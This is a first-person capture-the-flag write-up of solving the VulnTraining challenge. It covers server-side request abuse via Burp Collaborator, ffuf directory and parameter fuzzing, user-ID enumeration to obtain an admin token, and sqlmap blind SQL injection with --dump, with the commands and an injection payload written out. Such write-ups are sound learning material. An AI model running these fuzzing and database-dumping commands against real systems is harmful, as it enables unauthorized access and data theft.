Attacking VulnTraining Part 6

We are back attacking VulnTraining, it is the weekend and I am looking to finish this sucker off. Last time we found the api URL parameter but were not able to exploit it. I am going to keep focusing there.

I go back and look at what I attempted, still drawing a blank to what is possible, however I quickly dump in a SQL injection payload ('%20OR%201=1;--) but there is no luck there. I really wish I got the API error, not just the 500 error response but beggars can not be choosers. I keep picking at it until eventually I decide to check the Discord server to see what clues are available. Part of me hates this, but another realises that this is a hard challenge and I am not all knowing when it comes to hacking, I am doing this to learn after all.

I find the clue to use Burp Collaborator Client and it hits me. I was trying to find the API that was used internally, e.g. billing.vulntraining.co.uk?api=users. I should of been trying to use an external API. I decide to try something by setting up a HTTP web server locally using python before I use Collaborator. I grab my IP and start a server using python -m http.server 8081, but I can not get any requests to come through, although this was a quick “I wonder what would happen” experiment.

Thankfully through work I have access to Burp Collaborator, I start it up and I see a payload of a random string. I am not sure if this is a flag or a token, I test if it is a flag but it does not work. I then decide to try and hit the admin URL with this set as a token but still get unauthorised. I then notice that the string that is returned is actually the subdomain of the Collaborator session I am running, it clicks that I should just put in the admin subdomain and see what I get back.

I try the admin subdomain as the api parameter and see the billing page load, however the flag that I see is one I have already captured. I decide to keep testing, passing in the entire URL into ffuf to fuzz directories using ffuf -t 4 -p 0.15 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://billing.vulntraining.co.uk\?api\=admin.vulntraining.co.uk/FUZZ -H 'Cookie: ctfchallenge=[CTF_CHALLENGE_TOKEN]; token=[AUTH_TOKEN]' -mc all -fc 500 -fs 3547, with my hope being I can bypass the auth checks.

I get no results, all I know that the source of the data for billing comes from an API in admin.vulntraining.co.uk. I decide to post a question in the Discord channel, but as soon as I do that, I go back and use Burp Collaborator, realising that I did not check the request, lo and behold, I am an idiot and flag 9 is there.

Also returned is an X-Token header, I decide to grab that and add it to the headers of the requests to the admin subdomain, it returns some JSON about a request ID and an endpoint used, I decide to fuzz using the new header I have found using ffuf -t 4 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://admin.vulntraining.co.uk/FUZZ -H $CTF_CHALLENGE_COOKIE -H 'X-Token: TOKEN_I_FOUND' -mc all -fc 404.

From this I find to directories or endpoints, admin and invoices. I already know of invoices, so I decide to fuzz for any parameters I can find using ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/parameters.txt -u http://admin.vulntraining.co.uk/invoices\?FUZZ\=1 -H $CTF_CHALLENGE_COOKIE -H 'X-Token: TOKEN_I_FOUND' -mc all -fc 404 -fs 865. While I wait for that to complete I try and visit admin.vulntraining.co.uk/admin and I get a error about this user not having the relevant permissions.

Nothing is returned on the parameter fuzz, so all I know there is an endpoint /invoices. I call the endpoint and see the data from the list in the billing subdomains initial page, I then try changing the endpoint called to include an ID /invoices/1 and I get a single endpoint response. I also try and create an invoice using a POST request but I get a 404 response.

One of the tips for another flag is to keep fuzzing, so I decide to see if I can access anything nested deeper under /admin using ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://admin.vulntraining.co.uk/admin/FUZZ -H $CTF_CHALLENGE_COOKIE -H 'X-Token: 71e8b37bdc4c8edbf197d42f7c5ab56a' -mc all -fc 404. This nets me the endpoint /admin/users, I load this in a browser and I get “User does not have permission”. I add /1 to make the entire URL admin.vulntraining.co.uk/admim/users/1 and I get a new response, “User not found”.

I quickly ascertain it only wants a number, so I create a list to 1000 and start fuzzing to see what I can get. I get two results, one for ID 3 which gives me the token I already have as it is attached to the user dominic.bryant. I note that dominic.bryant has an attribute of "admin": false", however the second user I find is an admin, they also have flag 10 with them and a new token to use.

I grab the token and then try and load admin.vulntraining.co.uk and I get nothing new, so I decide to take the username and see if I can crack the password for the phpMyAdmin page, but the short list does not return any results. I also try the login page for the billing subdomain but get a “Username is invalid” meaning the user does not exist at all.

The error message for /admin about the user not having permissions leads me to go back and visit with the new token, to which I am given a response where I can see there is another endpoint in /admin/s3cr3t_m3ss4g3s. I load that and I get a new response leading me to /admin/s3cr3t_m3ss4g3s?id=2. This message states “Did you get my last message?”, so I instinctively go to /admin/s3cr3t_m3ss4g3s?id=1 but I get a response “Message is deleted”. I guess getting the original message is how I get the final flag.

I fuzz for other parameters using ffuf -t 3 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/parameters.txt -u http://admin.vulntraining.co.uk/admin/s3cr3t_m3ss4g3s\?id\=1\&FUZZ\=1 -H $CTF_CHALLENGE_COOKIE -H 'X-Token:ADMIN_KEY’ -mc all -fs 22` filtering anything that has the response size of 22 bytes but nothing returns.

Disappointingly I do remember seeing talk about a SQL injection in the Discord when looking for help with flag 9, so I decide to try that and determine there is a vulnerability around there. I come to the conclusion that the query most likely looks something like SELECT * FROM messages WHERE deleted = false AND id = 1;. This means I can not disabled the deleted flag and since I can not see the table information, it leaves me with Blind SQL Injection, I pull up the SQL Injection Cheat Sheet from Portswigger.

However before I decide to do this, I try and use SQLMap by entering sqlmap -u admin.vulntraining.co.uk/admin/s3cr3t_m3ss4g3s?id=2 -H "X-Token: 99663f8904af238fb1e3cedb2f8095f9" -H $CTF_CHALLENGE_COOKIE into my terminal. It goes through and identifies the database type as MySQL and then the id field is SQL injectable. I let it run, seeing that there are 3 fields in the query we are trying to hack, I would guess the fields are id, message and deleted. I find SQLMap so fascinating, one day I should read the source code for it, but all the power id does have is amazing to me.

I find out about the existence of the --dump option and I fall in love even more, it tells me the name of the DB, the name of the tables and even its contents, where I find the final flag. I pump that in and then decide to get some ice cream to celebrate.